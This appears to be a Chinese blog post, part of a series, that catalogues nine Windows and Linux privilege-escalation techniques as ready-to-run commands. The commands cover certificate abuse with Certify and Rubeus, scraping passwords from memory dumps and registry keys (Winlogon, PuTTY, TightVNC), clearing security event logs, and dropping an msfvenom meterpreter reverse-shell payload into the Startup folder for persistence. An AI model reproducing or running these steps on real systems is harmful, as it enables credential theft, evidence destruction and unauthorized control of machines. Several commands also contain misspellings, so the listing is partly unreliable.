百种提权及手段一览系列第7集

server/2024/10/18 19:26:58/

特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全>网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全>网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。
在这里插入图片描述

主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。

截至目前,我们一共分享了47种提权方法,本期我们继续整理了9种热门提权方式,本期分享完后,我们一共就分享了56热门提权的方法,而离100种方法也完成一半了,请大家继续查收哟,:
1.Certificate Abuse
域:Yes
Local Admin: Yes
操作系统: Windows
类型: Abusing Certificate
方法:
ceritify.exe request /ca:dc.domain.local\DC-CA /template:User…
Rubeus.exe asktgy /user:CORP\itadmin /certificate:C:\cert.pfx /password:password
2.Password Mining in Memory
域:No
Local Admin: Yes
操作系统: Linux
类型: Enumeration & Hunt
方法:
ps -ef | grep ftp;
gdp -p ftp_id
info proc mappings
q
dump memory /tmp/mem [start] [end]
q
strings /tmp/mem | grep passw

3.Password Mining in Memory
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
In Metasploit (msf > prompt) 输入: use auxiliary/server/capture/http_basic
In Metasploit (msf > prompt) 输入: set uripath x
In Metasploit (msf > prompt) 输入: run
在taskmgr中,右键单击“Image Name”栏中的“iexplore.exe”
并从弹出菜单中选择“创建转储文件”.
strings /root/Desktop/iexplore.DMP | grep “Authorization: Basic”
选择复制 Base64 编码字符串.
在命令提示符下键入: echo -ne [Base64 String] | base64 -d
4.Password Mining in Registry
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
打开命令并输入:
reg query “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v DefaultUsername
在命令提示符下键入:
reg query “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v DefaultPassword
请注意输出中的凭据
在命令提示符下键入:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyUsername
在命令提示符下键入:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyPassword
注意输出中的凭据
在命令提示符下键入:
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password
在命令提示符下键入:
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly
记下加密的密码并输入:
C:\Users\User\Desktop\Tools\vncpwd\vncpwd.exe [Encrypted Password]
从输出中记下凭据.

5.Password Mining in General Events via SeAudit
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
flog -s 10s -n 200
Or
invoke-module LogCleaner.ps1

6.Password Mining in Security Events via SeSecurity
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
flog -s 10s -n 200
Or
wevtutil cl Security

7.Startup Applications
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
In Metasploit (msf > prompt) 输入: use multi/handler
In Metasploit (msf > prompt) 输入: set payload windows/meterpreter/reverse_tcp
In Metasploit (msf > prompt) 输入: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) 输入: run
打开另一个命令提示符并键入:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
将 x.exe 放在“C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.

8.Password Mining in McAfeeSitelistFiles
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
1.
SharpUp.exe McAfeeSitelistFiles
批注:https://github.com/GhostPack/SharpUp

9.Password Mining in CachedGPPPassword
域名: Y/N
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
SharpUp.exe CachedGPPPassword


http://www.ppmy.cn/server/21093.html

相关文章

【ARMv9 DSU-120 系列 3 -- DSU-120 系统控制寄存器】

请阅读【Arm DynamIQ™ Shared Unit-120 专栏 】 文章目录 DSU-120 系统控制寄存器系统控制寄存器的访问方式Cluster 通用系统控制寄存器寄存器重置值Generic System Control registers summaryCluster Configuration RegisterDSU-120 系统控制寄存器 在ARMv9架构中,DSU-120(…

python绘制R控制图(Range Chart)

R控制图(Range Chart),也称为范围图或移动极差图,是一种用于分析和控制生产过程中的变异性的统计工具。它通常与Xbar控制图(均值图)一起使用,可以提供关于生产过程变异性的额外信息。以下是R控制…

【Vue3】watch监听使用【超详细】

文章目录 情况一:监听ref定义的基本类型数据情况二:监听ref定义的对象类型数据情况三:监听reactive定义的对象类型数据情况四:监听ref或reactive定义的对象类型数据中某个属性情况五:监听上述多个数据 #watch使用结构 watch(被监视的数据,监视的回调,配置对象(deep,immediate等…

使用 Python 和 DirectShow 从相机捕获图像

在 Python 中使用 OpenCV 是视觉应用程序原型的一个非常好的解决方案,它允许您快速起草和测试算法。处理从文件中读取的图像非常容易,如果要处理从相机捕获的图像,则不那么容易。OpenCV 提供了一些基本方法来访问链接到 PC 的相机(通过对象),但大多数时候,即使对于简单的…

[论文笔记]GAUSSIAN ERROR LINEAR UNITS (GELUS)

引言 今天来看一下GELU的原始论文。 作者提出了GELU(Gaussian Error Linear Unit,高斯误差线性单元)非线性激活函数: GELU x Φ ( x ) \text{GELU} x\Phi(x) GELUxΦ(x),其中 Φ ( x ) \Phi(x) Φ(x)​是标准高斯累积分布函数。与ReLU激活函数通过输入…

如何备考PMP考试?

最近几年,PMP报考人数居高不下,越来越多的企业认可PMP证书,招聘时也会报名拥有PMP证书者优先考虑。根据《薪酬力:项目管理薪酬调查报告》的数据,PMI所调查对象的30多个国家中,拥有PMP认证的薪资&#xff0c…

Rust学习03:解决了如何更改项目名称的小问题

好不容易跑通了第一个小程序! 高兴之余,突然又对小程序的名字不满意了,想改一个更好的。奇怪么?不奇怪!对于一位想不开而来自学Rust的人又有什么事情是做不出的呐~~ 开始我是直接改了项目文件夹的名字~捅了马蜂窝了&am…

Github创建远程仓库(项目)

天行健,君子以自强不息;地势坤,君子以厚德载物。 每个人都有惰性,但不断学习是好好生活的根本,共勉! 文章均为学习整理笔记,分享记录为主,如有错误请指正,共同学习进步。…